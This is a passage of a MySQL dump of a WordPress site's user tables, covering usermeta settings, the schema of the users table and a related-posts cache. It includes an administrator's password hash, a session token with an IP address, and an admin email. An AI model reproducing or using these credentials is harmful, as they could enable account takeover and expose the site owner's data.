KEYS */; INSERT INTO `w_usermeta` VALUES (1,1,'first_name',''),(2,1,'last_name',''),(3,1,'nickname','admin1'),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(11,1,'aim',''),(12,1,'yim',''),(13,1,'jabber',''),(14,1,'w_capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}'),(15,1,'w_user_level','10'),(16,1,'w_dashboard_quick_press_last_post_id','29'),(17,1,'w_user-settings','m5=o&m9=o&m6=o&m4=o'),(18,1,'w_user-settings-time','1303197518'),(19,1,'dismissed_wp_pointers','wp330_toolbar,aioseop_menu_220'),(20,1,'w_yarpp_saw_optin','1'),(21,1,'session_tokens','a:1:{s:64:\"f9a1f36c53d0292c48523703f1beb653739e2c6fe137b86aad2e67e9a2ecf0c2\";a:4:{s:10:\"expiration\";i:1426773647;s:2:\"ip\";s:13:\"62.69.216.211\";s:2:\"ua\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0\";s:5:\"login\";i:1426600847;}}'); /*!40000 ALTER TABLE `w_usermeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_users` -- DROP TABLE IF EXISTS `w_users`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_users` ( `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `user_login` varchar(60) NOT NULL DEFAULT '', `user_pass` varchar(64) NOT NULL DEFAULT '', `user_nicename` varchar(50) NOT NULL DEFAULT '', `user_email` varchar(100) NOT NULL DEFAULT '', `user_url` varchar(100) NOT NULL DEFAULT '', `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `user_activation_key` varchar(60) NOT NULL DEFAULT '', `user_status` int(11) NOT NULL DEFAULT '0', `display_name` varchar(250) NOT NULL DEFAULT '', PRIMARY KEY (`ID`), KEY `user_login_key` (`user_login`), KEY `user_nicename` (`user_nicename`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_users` -- LOCK TABLES `w_users` WRITE; /*!40000 ALTER TABLE `w_users` DISABLE KEYS */; INSERT INTO `w_users` VALUES (1,'admin1','$P$B8HFf/PGAw2hPK./tSsv7HM.me88Fi1','admin1','admin@maxserwer.com','','2011-02-28 09:11:55','',0,'admin1'); /*!40000 ALTER TABLE `w_users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_yarpp_related_cache` -- DROP TABLE IF EXISTS `w_yarpp_related_cache`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_yarpp_related_cache` ( `reference_ID` bigint(20) unsigned NOT NULL DEFAULT '0', `ID` bigint(20) unsigned NOT NULL DEFAULT '0', `score` float unsigned NOT NULL DEFAULT '0', `date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, PRIMARY KEY (`reference_ID`,`ID`), KEY `score` (`score`), KEY `ID` (`ID`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_yarpp_related_cache` -- LOCK TABLES `w_yarpp_related_cache` WRITE; /*!40000 ALTER TABLE `w_yarpp_related_cache` DISABLE KEYS */; INSERT INTO `w_yarpp_related_cache` VALUES (25,0,0,'2012-11-28 02:01:29'); /*!40000 ALTER TABLE `w_yarpp_related_cache` ENABLE KEYS */; UNLOCK TABLES; /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; -- Dump completed on 2017-02-27 1:26:55